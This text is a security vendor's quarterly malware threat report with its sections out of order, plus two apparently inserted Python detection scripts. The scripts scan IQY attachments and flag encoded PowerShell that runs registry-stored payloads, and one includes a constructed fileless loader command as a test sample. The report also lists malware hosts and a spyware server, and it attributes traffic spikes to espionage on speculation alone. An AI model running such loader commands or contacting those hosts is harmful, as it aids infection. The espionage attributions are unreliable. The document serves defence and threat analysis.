MUPX, or Modified "Ultimate Packer for Executables", dominated this part of the malware landscape. The underlying UPX is free, open-source software that supports numerous file formats and operating systems and leverages the open-source UCL data compression algorithm, whose decompressor is just a few hundred bytes of code.
In Q2 2018 Russia was the #1 home to malware Packers.
This timeline shows that Russia had the most persistent Packer problems while Iran had the highest periodic spikes
5.3.3 Email Flooder
Email Flooders are malware used to overwhelm an email server with messages in order to "kill" it or shut it down, a form of denial-of-service (DoS) attack.
The one Email Flooder that Comodo detected in Q2 2018 was Palevo, which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders.
The primary country where Comodo detected this malicious behavior was Germany.
And this timeline shows that while the number of Palevo detections was not high it was still a persistent threat in Germany
5.3.4 Virtual Tools
Virtual Tools are programs that can modify or alter malicious files to avoid detection.
The top Virtual Tools that Comodo detected in Q2 2018 were Patcher AntiAV and RunFile
The top two countries for Virtual Tools detections were Germany and the US
This timeline shows that Germany had one particularly heavy infestation around the beginning of June while the US had two sharp spikes one at the start and the other at the end of Q2 2018
5.3.5 Jokes
"Joke" malware is just what it says: non-malicious applications that claim to take a malicious action when in fact they are only intended as humor, or simply to annoy the user for a brief period of time.
Such malware is typically only labeled a "Medium" threat because the hacker's intention is not to damage or destroy information but merely to have fun at the victim's expense.
Germany (de) and the US were the top two countries of detection for Joke malware
In this timeline you can see that this malware type is not numerous, but still something to be aware of.
5.4 Low Threat Malware Applications
In this section we cover a range of malicious functionality that Comodo detected within Applications, Unwanted Applications and Unsafe Applications.
5.4.1 Applications
Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose. However, Comodo detects and flags such applications as malicious because they exhibit behavior of which users may be unaware, including extreme efforts to track user behavior and location.
In Q2 2018 the most common such application was Elex. Despite the fact that Microsoft has labeled Elex only a "Potentially Unwanted Application", or PUA, this software is nasty: it attempts to install files that run at startup, add drivers, inject processes, alter browser behavior and modify DNS settings.
The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications
And finally this timeline shows that far from being a rare occurrence such malicious software is endemic especially in North America
5.4.2 Unwanted Applications
The unwanted application category is alarming in that, during the course of common computer and Internet activity, users often inadvertently install these applications. For example, they include common adware programs, widely disseminated images, videos, dialers, jokes, gossip and more.
The most common unwanted application that Comodo detected this quarter was DealPly, which Microsoft describes as "poor reputation" software that tries to install additional bundled software, modify the user's homepage, modify the search provider and/or perform other actions users might not have intended. Such applications include free toolbars, adware and "system optimizers".
As you can see in the bubble chart the US is far and away the most common country of detection for unwanted applications in Q2 2018
And as this timeline shows this malware type poses not only a large but also a daily challenge to network security in the US
5.4.3 Unsafe Applications
Unsafe applications are seemingly legitimate programs that in fact are frequently leveraged by coders and hackers with malicious intent. Often they claim to help users with administrative or security functionality but in fact do the opposite; they include fake anti-virus and free Internet Relay Chat (IRC) clients.
The most common unsafe application that Comodo detected in Q2 2018 was AutoKMS, software that can be used to "crack" or patch unregistered copies of Microsoft software. Such programs are referred to as "hacktools" and may be distributed with additional malware that users can install inadvertently.
This malware type is a bit different in that, while the US is currently the most common country of detection, Ukraine (ua) and Russia (ru) are second and third respectively.
This timeline shows that the US, and to a lesser extent Ukraine, have a steady problem with Unsafe Applications, while Russia experienced one major spike in Q2 2018.
6 Vertical analysis
In this section, let's examine the unique malware profiles that Comodo identified within specific "verticals" or economic sectors. The infographic details unique malware distributions for twenty-two vertical markets or industries, from automotive to travel, covering four dangerous malware types: Backdoors, Trojans, Viruses and Worms. Further, the diagram lists the #1 malware family for each vertical's top malware type.
Let's take a closer look at two trojans, Kryptik and Zbot, that were the top detections not only in one but within multiple verticals, clearly making them a current strategic threat across the world.
First, Kryptik. The New Jersey Cybersecurity & Communications Integration Cell reported that Kryptik was first created to obtain information about an infected host's FTP servers but now has the ability to target email clients, file browsers and file managers. CNET Magazine wrote that Kryptik has been used as a trojan "Clicker" to boost the hit-count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash. Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country. Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017.
Second, let's examine "Zbot", which is another name for the "Zeus" Trojan, which has been undermining Microsoft Windows security since 2007. One of its first uses was to target the United States Department of Transportation, and over a decade later Zbot is still the top Trojan in the government and transportation verticals. Today the Zeus botnet may be the largest on the Internet, with millions of compromised machines around the world.
Zeus has often been used to steal financial information such as account numbers and passwords via keystroke logging and online form grabbing. It has also been used to install ransomware, including CryptoLocker. Zbot is often spread through drive-by downloads and email phishing attacks, sometimes supported by a social engineering scheme that falsely claims that a target's computer already has a virus and needs to be cleaned.
In conclusion, trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks. Second, strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies the primary malware threats and better focuses limited time and resources against them.
7 Geopolitical Intelligence
7.1 USA
This timeline displays a range of the most dangerous malware types detected within the United States in spring 2018. Clearly, the major spike on March 13 stands out in this data. What happened on this day in the US, and what might help to explain the surge in malware activity? On that day, US President Donald Trump announced the names of his new Secretary of State, Mike Pompeo, and new CIA Director, Gina Haspel. In that light, one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements comprising many requests for information related to upcoming changes in US political, military and intelligence activities, after which these agencies immediately began to fulfill these requirements via computer hacking, commonly called cyber espionage, which today takes place on a far greater scale than the public realizes.
7.2 China
This chart illustrates Comodo's aggregated malware detections in China for Q2 2018. Clearly, June 4 stands out as the single most prominent day. The reason for this massive spike is that many intelligence services, both foreign and domestic, were likely busy trying to protect and/or collect sensitive information relating to current events within China. Why on June 4? That is the anniversary of the 1989 Tiananmen Square protests.
7.3 South Korea
National security events always attract the attention of professional hackers, who seek to collect the kind of information that serves as the basis for intelligence reporting. This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018. The highest single spikes took place simultaneously with the annual joint US-South Korean military exercises. This fact should come as little surprise in the Internet age, when everyone from students to soldiers, spies and statesmen does most of their work online: students collect data for academic papers, spies collect data for intelligence reports.
7.4 North Korea
The chart above shows Comodo malware detections in North Korea during Q2 2018. At the beginning of May, Comodo saw a spike consisting of well over ten times the usual number of detections. One plausible explanation for this activity is that someone or some institution was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world. Comodo did further research on the detected malware and identified it as Windows activation or "cracking" software and Chinese-made anti-censorship programs.
7.5 Armenia
All major geopolitical events today are bathed in malware. The reason is that all activities, from social activities to business, politics or national security affairs, are mostly performed online. This is especially true during times of national crisis, as both government and citizens are in overdrive trying to gather new information, or trying to prevent others from doing the same. Ample evidence is provided by this timeline, which shows that Armenia's 2018 political revolution was accompanied by Comodo's largest detection of malware within that country during Q2 2018.
7.6 Belarus
A common hacker refrain is that "information wants to be free". Evidence for this argument is provided by this timeline, which shows Comodo's virus and trojan detections in Belarus in Q2 2018. On June 14, as the government in Minsk passed new legislation with a view toward controlling the spread of "fake news", Comodo detected a massive spike in both viruses and trojans. It is possible that the virus outbreak was specifically used to disseminate trojan horses, which were then leveraged for some real-world purpose: either to gather, deny or manipulate sensitive information related to the new legislation and its impact on Belarusian society.
7.7 Iraq
Today there is possibly no hotter topic in information security than election hacking. In this chart showing Comodo malware detections in Iraq in Q2 2018, two clear spikes stand out that we must consider. Both might be associated with recent electoral incidents. In mid-April, Iraq was preparing for a national election, which included a conundrum on how best to secure its electronic dimension. And at the beginning of July, Iraq was preparing for a vote recount following accusations of impropriety at the polls.
7.8 Ukraine
Sometimes it is hard to know the reason for a specific spike in malware detection, and sometimes there may be multiple reasons. In this timeline of Comodo malware detections in Ukraine in Q2 2018, there may have been multiple reasons for the highest spike, on May 24. Both of the cited news stories are from May 23: the first discusses Ukraine's Independence Day as well as Ukraine's testing of new military weapons provided by the US government; the second describes a cyberattack that Ukraine feared would target a major sporting event, the Champions League final in Ukraine's capital city, Kyiv, on May 26.
7.9 Croatia
Since the cyberattack that targeted Estonia in 2007, it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations. In that context, this massive spike in malware detection in Croatia on March 28 is interesting, as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an "act of hostility".
7.10 Finland, Russia, USA
Finally, let's have a look at Comodo's virus detections in Finland during Q2 2018. The largest single spike, by far, occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki. Geolocation of this virus activity in Finland revealed that it almost exclusively took place in Helsinki's suburb of Vantaa, precisely where the summit was scheduled to take place.
8 Conclusions
In Q2, Comodo Cybersecurity observed several significant new trends likely to radically influence the cybersecurity marketplace and IT end users. These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios.
The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon. Trojans are a covert weapon, and the cybersecurity industry should suppose that many trojan-based attacks that occurred in Q2 remain undetected, with the real impact of these attacks being revealed in quarters to come. Another meaningful fact is that trojans serve as a delivery vector for other types of malware. Combined, these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples.
Our findings show that malware is becoming more cunning in delivery method, more sophisticated in persistence and much harder for antivirus software to detect. Propagation of fileless malware, the evolution of cryptominers and the use of legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication.
Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems, presaging new attacks and mobile malware development. As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures), cybercriminals can anticipate rich pickings from exploiting those devices. With successful penetration, perpetrators profit by stealing money, selling confidential information or blackmailing victims.
Moreover, given that the majority of detected trojans in Q2 were information stealers, we can see another dangerous tendency: the accelerating bias of cybercriminals toward hunting for confidential data.
Combined, these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future, creating changes in the cybersecurity landscape and forcing IT-security departments to update their security measures and probably revamp their security strategy, policies and postures.
Comodo Threat Research Labs monitors, filters and analyzes malware, ransomware, viruses and other "unknown" potentially dangerous files 24/7/365 in over 190 countries around the world. With 5 offices spread across the Americas, Asia and Europe (and staff covering over 190 countries), the Lab is made up of more than 220 IT security professionals, ethical hackers, computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing millions of potential pieces of malware, phishing, spam or other malicious/unwanted files and emails every day. The Lab also works with trusted partners in academia, government and industry to gain additional insights into known and potential threats. CTRL's mission is to use the best combination of cybersecurity technology and innovations, machine learning-powered analytics, artificial intelligence and human experts and insights to secure and protect Comodo Cybersecurity customers, business and public-sector partners and the public community.
About Comodo Cybersecurity
Comodo Cybersecurity is a global innovator of cybersecurity solutions, protecting critical information across the digital landscape. Building on its unique position as the world's largest certificate authority, Comodo Cybersecurity authenticates, validates and secures networks and infrastructures from individuals to mid-sized companies to the world's largest enterprises. Comodo Cybersecurity provides complete end-to-end security solutions across the boundary, internal network and endpoint with innovative technologies solving the most advanced malware threats, both known and unknown. With global headquarters in Clifton, New Jersey, and branch offices in Silicon Valley, Comodo Cybersecurity has international offices in China, India, the Philippines, Romania, Turkey, Ukraine and the United Kingdom. For more information visit comodo.com. Comodo Cybersecurity and the Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc or its affiliates in the US and other countries. Other names may be trademarks of their respective owners. The current list of Comodo Cybersecurity trademarks and patents is available at comodo.com/repository.
The purpose of the VBScript is to launch PowerShell
The malware downloads itself to a temporary folder and executes binaries located at hxxpwwwiyilikleralemicomGtXvlchxxpwwwthecyberconxioncomPUqUUe hxxpEliasWesselcomvu6xGmShxxpmossbeachmusicdeXuBBN6r hxxpairmaxxrswIdY
At the time of writing, only the thecyberconxion.com host was serving a malware binary (SHA1 5974190561e707f63d776e55336841bd871eebdb).
The binary moves itself to C:\Windows\SysWOW64\lanesviewer.exe and creates a service named "lanesviewer" to ensure persistence.
The malware creates the "lanesviewer" service to ensure persistence
And after that, Emotet begins its real mission: stealing private data from the compromised system, which it then sends to the cybercriminals' Command & Control server.
The next example is even more cunning, because it infects computers by means of popular, legitimate Microsoft software.
2.3 Flawed Ammyy RAT attack based on legitimate software
The Flawed Ammyy trojan has a nefarious and diverse background of use in cyberattacks. What is most impressive is that it is based on legitimate software called Ammyy Admin. Its history is a striking example of how malicious hackers turn legitimate tools into a thief's tool.
Ammyy Admin is remote desktop software created by the Ammyy Group company. It provides an easy way to establish a reliable remote desktop connection, connecting remote computers within seconds without additional installation or configuration work.
The dark side of this tool is that its features ideally suit the purposes of cybercriminals. Unsurprisingly, perpetrators tried to adopt it for their malicious activity. Cybercriminals repeatedly compromised the Ammyy Group website and replaced the original Ammyy Admin software with a bundle containing malware. Thus every user who downloaded Ammyy Admin became covertly infected. Ammyy Group cleaned up the compromised website, but the attackers infected it again, and this vicious cycle continued endlessly.
As you can see on the diagram, Ammyy Admin was used in spreading many types of nefarious malware.
The newest malicious modification of Ammyy Admin is called Flawed Ammyy. It's a remote access trojan (RAT) that appeared in the wild at the beginning of 2016. It got its name from the leaked source code of the third Ammyy Admin version. Flawed Ammyy RAT lets the attackers use functions such as Remote Desktop control, File System Manager, proxy support and audio chat. Cybercriminals take total control of the infected host and can run amok: steal credentials and documents, remove or add files, run applications, install other malware, etc.
The way Flawed Ammyy was spread in the second quarter deserves special attention, because it used a new trick to infect users. What is especially worth noticing is the fact that these tricks are also based on using legitimate software, Microsoft's this time.
Flawed Ammyy is delivered to the victims through phishing emails with an IQY file attachment, as in the following screenshot.
The phishing email
IQY files are intended for making an Internet query from MS Excel, so an IQY contains a URL and other related parameters. It can download files and run them directly in MS Excel.
The infected IQY included a malicious URL, so it runs a chain of malicious files that results in downloading and running Flawed Ammyy via Windows PowerShell.
Malware runs PowerShell
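The IQY layout described above (query type, format version, URL, then Key=Value options) is small enough to parse at a mail gateway and flag queries that point outside the organisation. The following checker is an added example, not code from the report or from Comodo; the allowlisted hosts and the sample attachment are constructed placeholders.

```python
"""Parse Excel Internet Query (.iqy) attachments and flag risky web queries.

Added example (not from the report). Layout assumed per the IQY format:
line 1 = query type ("WEB"), line 2 = format version, line 3 = URL,
remaining lines = Key=Value options. All hostnames below are constructed.
"""
from dataclasses import dataclass, field
from urllib.parse import urlsplit

# Constructed allowlist: internal data sources from which IQY files are expected.
TRUSTED_HOSTS = {"reports.intranet.example", "bi.corp.example"}

# File types that indicate the query fetches code rather than tabular data.
CODE_SUFFIXES = (".exe", ".dll", ".bat", ".cmd", ".ps1", ".vbs", ".js", ".hta")


@dataclass
class IqyQuery:
    query_type: str
    version: str
    url: str
    options: dict = field(default_factory=dict)


def parse_iqy(text: str) -> IqyQuery:
    """Split an IQY body into its fields; raises ValueError on malformed input."""
    # Excel tolerates CRLF line endings and a UTF-8 BOM; normalise both.
    lines = [ln.strip() for ln in text.lstrip("\ufeff").splitlines()]
    lines = [ln for ln in lines if ln]  # blank lines carry no meaning
    if len(lines) < 3:
        raise ValueError("not an IQY file: fewer than three non-empty lines")
    query_type, version, url = lines[0].upper(), lines[1], lines[2]
    if query_type != "WEB":
        raise ValueError(f"unsupported query type {query_type!r}")
    options = {}
    for ln in lines[3:]:
        key, sep, value = ln.partition("=")
        if sep:
            options[key.strip()] = value.strip()
    return IqyQuery(query_type, version, url, options)


def assess_iqy(text: str) -> list[str]:
    """Return human-readable findings; an empty list means nothing suspicious."""
    q = parse_iqy(text)
    parts = urlsplit(q.url)
    host = (parts.hostname or "").lower()
    findings = []
    if parts.scheme not in ("http", "https"):
        findings.append(f"unexpected scheme {parts.scheme!r}")
    elif parts.scheme == "http":
        findings.append("plaintext http: the fetched content can be altered in transit")
    if host not in TRUSTED_HOSTS:
        findings.append(f"external host {host!r} not on allowlist")
    if parts.path.lower().endswith(CODE_SUFFIXES):
        findings.append(f"URL path {parts.path!r} fetches code, not tabular data")
    if parts.query:
        findings.append("URL carries a query string (possible per-victim tracking)")
    return findings


# Constructed sample modelled on the lure described above: an unknown host over plain http.
SAMPLE_IQY = (
    "WEB\r\n"
    "1\r\n"
    "http://files.lure-host.invalid/invoice.txt\r\n"
    "Selection=EntirePage\r\n"
    "Formatting=None\r\n"
)

if __name__ == "__main__":
    for finding in assess_iqy(SAMPLE_IQY):
        print("-", finding)
```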
Thus, in this case, machines face extremely dangerous and potent malware created and delivered via legitimate software. This feature makes it much harder for antivirus software to detect an attack.
2.4 The growth of Flawed Ammyy attacks for Q2
The growth of Flawed Ammyy attacks for Q2
2.5 Ammyy Admin dissemination around the world for Q2
As illustrated, trojans became an 800-pound gorilla in the malware market in Q2. This trend will inevitably entail a change of attack vectors toward covert theft and manipulating users. This trend is a real gift for cybercriminals and a terrible nightmare for users.
Trojans let attackers gain time. As the malware acts covertly, the cybercriminals have more than enough time to use stolen data to their advantage. In many cases attacks can only be discovered too late, after money is withdrawn from a bank account, confidential data is published, etc. Merging trojans as payloads and phishing emails as the means of delivery, as observed during Q2, will result in a huge surge in such attacks and victims. And using legitimate tools like PowerShell for running malware will amplify the number of victims even more, because such attacks are much harder to detect with antiviruses.
To fight these attacks, cybersecurity departments need to rearrange their approach to security measures per the new trends above. Combining the best malware detection tools and methods of protecting data, built on defense-in-depth principles, provides the most promising solution.
[Chart: The growth of Flawed Ammyy attacks for Q2. Monthly detection counts shown on the chart are 43188, 46382 and 48881 for Apr, May and Jun, on a vertical axis running from 40000 to 50000.]
3 Cryptominer Evolution
Going Fileless, Killing Competitors, Crashing Systems
Cryptominers do not lead the Q2 malware pack, but that does not mean that their impact is greatly diminished. On the contrary, current cryptominer behavior recalls that of an army preparing for battle: training and reprovisioning to fight more efficiently. Cryptominers are quickly developing and gaining new dangerous abilities.
Earlier cryptomining examples were only able to use infected machine resources to mine cryptocurrency on behalf of the attackers. For that reason, many users did not regard them as particularly dangerous: at least cryptominers would not steal information or destroy data like other malware, merely sucking up CPU resources. Moreover, they typically did not employ strong obfuscation and could be easily discovered and deleted.
But Q2 events clearly showed that the situation has radically changed.
New samples of cryptominers detected by Comodo malware analysts exhibit far more harmful abilities than those required for merely mining cryptocurrency. These samples clearly show that cryptominers are transforming into a sophisticated and multifunctional weapon for cybercriminals. They are learning to hide and to fight against antimalware tools. They can camouflage themselves, kill competing cryptominers and even crash user systems if met with an attempt to delete the malware.
3.1 BadShell attacks enterprises
Fileless malware is next-generation malware, especially compared with traditional infection via .exe files. File-based malware resides on the hard drive, making it easier to detect. But fileless malware is different. As its name suggests, this type of malware represents malicious code injected into legitimate OS processes. It need not be installed on a victim machine but functions only in memory, making it much harder for antiviruses to detect.
Usually such malware is spread via malicious ad banners. Clicking on a banner redirects a user to an infected website, where the malware covertly installs itself on the victim's computer. As many antivirus tools cannot detect it, users remain unaware of being infected. Not surprisingly, its use by cybercriminals is on the increase.
Last quarter, Comodo Threat Research Labs analysts faced a scenario of just such an attack. A company with several thousand endpoints was compromised by fileless malware. When their legacy security software failed to protect them, the company looked to Comodo Threat Research Labs for assistance.
Comodo analysts revealed that the malware was a cryptominer that utilized legitimate Windows components: PowerShell to execute commands, Task Scheduler to ensure persistence and the Registry to hold the malicious binary code. In the screenshots below you see exactly how the malware, dubbed BadShell, works.
If we decode the PowerShell arguments, we see the malicious code in the registry. The code is injected into an existing running process by the PowerShell script.
BadShell at work
The malicious code in the registry
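The BadShell chain above (an encoded PowerShell command line, a payload read back from the registry, and a scheduled task for persistence) leaves traces in process-creation logs that can be checked automatically. The following scanner is an added example, not code from the report or from Comodo: it decodes the Base64/UTF-16LE `-EncodedCommand` argument that PowerShell accepts and scores the decoded text against indicator patterns; the registry path, task name and log lines are constructed placeholders.

```python
"""Decode PowerShell -EncodedCommand arguments and score BadShell-style indicators.

Added example (not from the report). Input is a process command line as recorded
by an EDR or Windows process-creation auditing; sample lines are constructed.
"""
import base64
import re

# PowerShell accepts -e, -ec, -en, -enc, ... as abbreviations of -EncodedCommand.
ENCODED_ARG = re.compile(r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")

# Patterns matched against the raw command line plus the decoded script.
INDICATORS = {
    "encoded_command": re.compile(r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s"),
    "hidden_window": re.compile(r"(?i)-w(?:indowstyle)?\s+hidden"),
    "no_profile": re.compile(r"(?i)-nop(?:rofile)?\b"),
    "registry_read": re.compile(r"(?i)Get-ItemProperty(?:Value)?|\bHK(?:LM|CU):|Registry::"),
    "base64_decode": re.compile(r"(?i)FromBase64String"),
    "dynamic_exec": re.compile(r"(?i)\bIEX\b|Invoke-Expression"),
    "memory_injection": re.compile(r"(?i)VirtualAlloc|WriteProcessMemory|CreateRemoteThread"),
    "scheduled_task": re.compile(r"(?i)schtasks(?:\.exe)?\s+/create|Register-ScheduledTask"),
}


def decode_encoded_command(cmdline: str):
    """Return the script behind -EncodedCommand, or None if absent or malformed."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        # PowerShell encodes the script as UTF-16LE before Base64.
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def scan_command_line(cmdline: str) -> dict:
    """Decode the line and list which indicators fire; 'review' at three or more."""
    decoded = decode_encoded_command(cmdline)
    haystack = cmdline + "\n" + (decoded or "")
    hits = [name for name, rx in INDICATORS.items() if rx.search(haystack)]
    verdict = "review" if len(hits) >= 3 else "ok"
    return {"decoded": decoded, "indicators": hits, "verdict": verdict}


def _encode(script: str) -> str:
    """Build a test fixture the way PowerShell expects: UTF-16LE, then Base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed inner script mirroring the described pattern: fetch a blob from a
# registry value, decode it and hand it to the interpreter. Path is a placeholder.
INNER_SCRIPT = (
    "$b=(Get-ItemProperty -Path 'HKCU:\\Software\\PlaceholderVendor').Payload;"
    "$c=[Convert]::FromBase64String($b);"
    "IEX([Text.Encoding]::Unicode.GetString($c))"
)

# Constructed log lines: one routine admin script, one BadShell-style launch,
# one scheduled task that relaunches the same encoded command.
SAMPLE_COMMAND_LINES = [
    r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\nightly-backup.ps1",
    "powershell.exe -nop -w hidden -enc " + _encode(INNER_SCRIPT),
    'schtasks.exe /create /sc minute /mo 30 /tn "PlaceholderUpdater" '
    '/tr "powershell.exe -w hidden -enc ' + _encode(INNER_SCRIPT) + '"',
]

if __name__ == "__main__":
    for line in SAMPLE_COMMAND_LINES:
        r = scan_command_line(line)
        print(r["verdict"], r["indicators"])
```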
This emergency clearly demonstrates how dangerous cryptominer activity can be. Just imagine it: the entire compute capacity of the enterprise's computers was engaged in mining cryptocurrency, depriving employees of the ability to perform their jobs. Comodo analysts took over the situation and cleaned the infection from all involved computers, but of course the financial losses of the company were irreversible.
Invulnerability to antivirus and persistence in the system are the most important attributes for a cryptominer, because the longer it runs within the infected system, the more it profits the attackers. That is why cybercriminals give special attention to a cryptominer's ability to elude antivirus software.
Below is another cunning technique that turns an infected machine into a slave of the attacker.
3.2 WinstarNssmMiner: a system killer
Like other cryptominers, WinstarNssmMiner is purposed to steal computer resources to mine cryptocurrency coins for cybercriminals. But it has a special feature: it can root into a system so deeply that it becomes unremovable. Attempting to kill it will kill the target system totally.
The secret of WinstarNssmMiner's persistence lies in its method of infecting a victim's computer. It consists of two processes injected into two system svchost.exe processes. The first performs the main task, mining cryptocurrency. The other runs in the background, looking for antivirus products and disabling them.
The malicious code disguised as svchost.exe
Especially impressive is that both infected svchost.exe processes possess the system attribute "CriticalProcess", meaning that terminating either of them will crash the system, leaving the user with a blue screen.
WinstarNssmMiner spreading around the world
Cryptominers can kill not only victims' systems but also their cryptomining competitors.
3.3 CoinMiner kills rivals
CoinMiner stands out against other cryptominers with a kill-list feature that checks the infected machine for the presence of other cryptomalware. If an "alien" cryptominer is detected, the feature will terminate its processes.
CoinMiner kills its rivals as follows.
The code below downloads CoinMiner for the Windows architecture in use (x86 or x64) and then checks whether a miner is already running by testing for the presence of an "AMDDriver64" process.
The code downloads CoinMiner and checks if a miner is already running
The malware maintains two lists, named $malwares and $malwares2, with the names of the processes that it is instructed to kill. The lists include other types of cryptominers.
In this way, CoinMiner exclusively occupies the victim's computer to use its resources for mining cryptocurrency.
Some cryptominers earned the spotlight of the mass media and cybersecurity researchers, making it easier for users to detect them. In Q2 these cryptominers learned to hide; CoinHive is the brightest example of them.
3.4 CoinHive changes its skin
CoinHive is a popular JavaScript cryptominer. If you put its string of code into your website page, every visitor to the site will mine coins for you.
As you can see, the CoinHive script is easily detected.
The CoinHive script
After many publications on this subject in the mass media and cybersecurity reports, users have started checking websites' code for cryptominers. But in the second quarter, perpetrators found a way to overcome this obstacle. Now they use a sneaky trick to camouflage the CoinHive presence with URL shorteners.
As a result, the malicious code on a webpage looks like this:
The obfuscated malicious code on a webpage
If we decode the string, we encounter an iframe.
The iframe loads the URL shortener
Notice that the width and height of the iframe are set to 1 to make the iframe as invisible as possible.
Now let's look at the URL https://cnhv.co.
And there we can find the familiar link to CoinHive.
The link to CoinHive
What is the impact of this trick? In a simple scenario, a user visits a CoinHive-infected website. Noticing that her computer's CPU is overloaded, she decides to check the webpage code but doesn't find any signs of a cryptominer. So she concludes that something went wrong with her PC, while CoinHive co-opts her computer to mine cryptocoins.
The next malware in the row prefers not to mine cryptocurrency but to steal it on the fly.
3.5 Cryptocurrency clipboard hijacker intercepts transfers
It would be more accurate to call this program a cryptothief rather than a cryptominer, because it does not devour an infected machine's resources but instead actually steals cryptocurrency, redirecting it to the perpetrator.
Cryptocurrency transfers require a wallet address. The address is a long string combining different characters and numbers, so it is almost impossible to remember it or fill it in manually. That is why users usually copy-paste a wallet address to make a transaction. Cybercriminals regard this copy-paste process as a breach they can use to their advantage.
The cryptocurrency clipboard hijacker checks the clipboard for a copied wallet address. Upon finding one, it replaces it with the address of a wallet under the attacker's control. So the unaware owner of the infected machine delivers cryptocoins straight into cybercriminals' hands.
A new Cryptocurrency Clipboard Hijacker sample can monitor 2,343,286 addresses
This malware is distributed in a bundle with the All-Radio 4.27 Portable software. All-Radio 4.27 is a legitimate video and audio player created by Russian developers. But cybercriminals copied the program and added the malicious code. The malicious version of All-Radio 4.27 was used for spreading different types of malware, clipboard cryptocurrency hijackers among them.
Here is an example of a clipboard hijacker attack.
A user copied the wallet address 3FC7NCLR3EHDRvqw7AUP3BeoC4LAtWPXFs, but the malware changed it to 1HMF9YCP1VcVMKryZzrV6adEq9Dp61Zrmm.
An example of a clipboard hijacker attack
Spreading of Clipboard Hijacker malware around the world
Although cryptominers have decreased in quantity, they seem to be coming back in an updated disguise and promise to become a new, serious challenge for cybersecurity departments and vendors.
4 Android Devices Under Siege

4.1 Spying, Stealing, Mining

Android devices are rapidly becoming high-value targets for cybercriminals and malware authors. It is not surprising, because today almost any smartphone is a treasure trove of information for perpetrators. People increasingly use smartphones for financial operations, but those are not the only jackpot for attackers. Today every smartphone contains a plethora of confidential information about its owner.

If the victim is a CEO, politician or other VIP, the content of the mobile device can be sold at the highest prices. Perpetrators can sell stolen information to interested parties or extort money by blackmailing their victims. Of course, not only cybercriminals hunt for smartphone content. Intelligence agencies and business competitors want to know everything about their targets. Add jealous spouses tracking every move of their partners and parents wanting to control their children, and you will easily understand why Android-oriented malware is a growing business.

Today spying is the number one purpose of Android malware. In Q2, Comodo analysts detected a variety of spying tools that penetrate mobile devices and extract data from them. You can see the whole family of these digital spooks on the graph.
The digital spooks
Like real-world spies, digital agents impersonate legitimate entities, pretending to be innocent applications or hiding malicious code inside legitimate software. Like real spies, they seek to remain invisible, constantly change disguises to avoid detection, and hone their tradecraft from version to version.

4.1.1 KevDroid

The first is named KevDroid. It's distributed in three versions:

Version-1: Naver Defender
Version-2: Netease Defender
Version-3: PU

Disguises of KevDroid

The first version, disguised as the Naver Defender application, covertly penetrates a mobile device and hides its icon from the launcher screen to avoid detection. This sample has multifunctional spying abilities. It steals account details (contacts, ID, name, phone numbers and email address of the owner). It grabs SMS messages and associated info. It attempts to read call logs (number, name, type, duration), emails (email, type) and photos of the contacts. After extracting all the data, the malware encrypts it with the AES algorithm and sends it to the attackers' server, hxxp://cgalim[.]com/admin/hr/pu/pu.php?do=upload (defanged).

KevDroid records the victim's every phone call, then encrypts and uploads it to the cybercriminals' server. In addition, it collects information about currently running services, installed apps and the launcher name.

The second version, Netease Defender, has additional spying abilities. It takes control of the device camera and covertly records the victim's activity, then sends the video to the attackers' server.

Version-3 of KevDroid takes photos, records calls and creates a list of files on the device. It also extracts the web history, account and contact details, and the device information.

People assume they are safe if they download apps exclusively from the official Google Play store. This wrong assumption can be costly: the first version of the Desert Scorpion spyware was spread via official Google Play Services. The spyware was camouflaged as a chat app called Dardesh Instant App. But when a user downloaded and ran it, the app covertly connected to the cybercriminals' Command and Control server and downloaded the spyware onto the device. From that moment, the spyware constantly kept track of all events on the infected device. Another means of the malware's dissemination was social networks.

Version-1: Dardesh, Google Play Services, Instant Apps
Version-2: Settings

Disguises of Desert Scorpion

The second version of Desert Scorpion records calls, audio and video, uninstalls other apps, sends and receives messages, and tracks the location of the smartphone. It is included in some spyware tools like FinSpy and Pegasus. Beyond the capabilities of the first version, it collects information about installed applications, extracts the metadata and makes changes on the victim's device.
4.1.2 Zoo Park

The next member of the spy family, Zoo Park, has 4 different versions:

Version-1: Telegram Groups, انتخاب دھم
Version-2: Postrall, Yes For Referendum, انتخاب دھم
Version-3: Celebs Gone Wild, جریدة النھار الكویتیة, 剑侠挂机
Version-4: VPN Easy, DroFirewall, m_android

Disguises of Zoo Park

